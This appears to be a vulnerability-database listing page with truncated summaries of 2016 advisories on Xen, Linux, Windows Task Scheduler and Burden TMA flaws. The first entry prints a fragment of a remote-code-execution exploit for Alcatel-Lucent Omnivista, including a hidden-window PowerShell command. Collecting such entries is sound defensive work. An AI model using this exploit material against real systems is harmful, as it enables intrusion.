Alcatel Lucent Omnivista 8770 - Remote Code Execution Exploit

Exploit for windows platform in category remote exploits import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object...

Fedora 24 : xen (2016-95c104a4c6)

xen : various security flaws 1397383 x86 null segments not always treated as unusable XSA-191, CVE-2016-9386 x86 task switch to VM86 mode mis-handled XSA-192, CVE-2016-9382 x86 segment base write emulation lacking canonical address checks XSA-193, CVE-2016-9385 x86 64-bit bit test instruction...

FreeBSD : xen-kernel -- x86 task switch to VM86 mode mis-handled (523bb0b7-ba4d-11e6-ae1b-002590263bf5)

The Xen Project reports : LDTR, just like TR, is purely a protected mode facility. Hence even when switching to a VM86 mode task, LDTR loading needs to follow protected mode semantics. This was violated by the code. On SVM AMD hardware: a malicious unprivileged guest process can escalate its...

CVE-2016-7911

A use-after-free vulnerability in sysioprioget was found due to gettaskioprio accessing the task-iocontext without holding the task lock and could potentially race with exitiocontext, leading to a use-after-free...

Burden TMA v2.1.1 - (Task) Persistent Web Vulnerability

Document Title: =============== Burden TMA v2.1.1 - Task Persistent Web Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=1998 Release Date: ============= 2016-11-26 Vulnerability Laboratory ID VL-ID: ==================================== 199...

Burden TMA 2.1.1 Cross Site Scripting

Document Title: =============== Burden TMA v2.1.1 - Task Persistent Web Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=1998 Release Date: ============= 2016-11-26 Vulnerability Laboratory ID VL-ID: ==================================== 199...

x86 task switch to VM86 mode mis-handled

ISSUE DESCRIPTION LDTR, just like TR, is purely a protected mode facility. Hence even when switching to a VM86 mode task, LDTR loading needs to follow protected mode semantics. This was violated by the code. IMPACT On SVM AMD hardware: a malicious unprivileged guest process can escalate its...

xen-kernel -- x86 task switch to VM86 mode mis-handled

The Xen Project reports: LDTR, just like TR, is purely a protected mode facility. Hence even when switching to a VM86 mode task, LDTR loading needs to follow protected mode semantics. This was violated by the code. On SVM AMD hardware: a malicious unprivileged guest process can escalate its...

[SECURITY] Fedora 25 Update: ansible-2.2.0.0-3.fc25

Ansible is a radically simple model-driven configuration management, multi-node deployment, and remote task execution system. Ansible works over SSH and does not require any software or daemons to be installed on remote nodes. Extension modules can be written in any language and are transferred t...

DEBIAN-CVE-2016-7911

Race condition in the gettaskioprio function in block/ioprio.c in the Linux kernel before 4.6.6 allows local users to gain privileges or cause a denial of service use-after-free via a crafted ioprioget system call...

UBUNTU-CVE-2016-7911

Race condition in the gettaskioprio function in block/ioprio.c in the Linux kernel before 4.6.6 allows local users to gain privileges or cause a denial of service use-after-free via a crafted ioprioget system call...

Chrome memory the bug be exploited by hackers: Google has yet to fix-vulnerability warning-the black bar safety net

According to foreign media reports, recently the IT security and protection company Sophos announced that the Chrome browser there is a Bug currently has hackers use. Worse, Google two years ago are aware of this Bug, but until today not yet repaired. ! Chrome memory the bug be exploited by...

CVE-2016-7222

Task Scheduler in Microsoft Windows 10 Gold, 1511, and 1607 and Windows Server 2016 allows local users to gain privileges via a crafted UNC pathname in a task, aka "Task Scheduler Elevation of Privilege Vulnerability."...

CVE-2016-7222

Task Scheduler in Microsoft Windows 10 Gold, 1511, and 1607 and Windows Server 2016 allows local users to gain privileges via a crafted UNC pathname in a task, aka "Task Scheduler Elevation of Privilege Vulnerability."...

Privilege escalation

Task Scheduler in Microsoft Windows 10 Gold, 1511, and 1607 and Windows Server 2016 allows local users to gain privileges via a crafted UNC pathname in a task, aka "Task Scheduler Elevation of Privilege Vulnerability."...

CVE-2016-7222

CVE-2016-7222 affects Task Scheduler in Windows 10 (Gold/1511/1607) and Windows Server 2016. A locally authenticated attacker can abuse Task Scheduler by creating a task that uses a specially crafted UNC path to execute code with elevated privileges. The root cause is how Task Scheduler handles U...

Microsoft Windows Multiple Vulnerabilities (3199172)

This host is missing a critical security update according to Microsoft Bulletin MS16-130. SPDX-FileCopyrightText: 2016 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability

Microsoft Windows is a series of operating systems released by the American company Microsoft. An elevation of privilege vulnerability exists in the Microsoft Windows Task Scheduler. An authenticated local attacker could use the Windows Task Scheduler to schedule new tasks via a malicious UNC pat...

Task Scheduler Elevation of Privilege Vulnerability

An elevation of privilege vulnerability exists in Task Scheduler when a user creates a task that uses UNC paths. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. To exploit the vulnerability, a locally authenticated attacker could...

Microsoft Windows Task Scheduler CVE-2016-7222 Local Privilege Escalation Vulnerability

Description Microsoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges. Technologies Affected Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version 1607 for...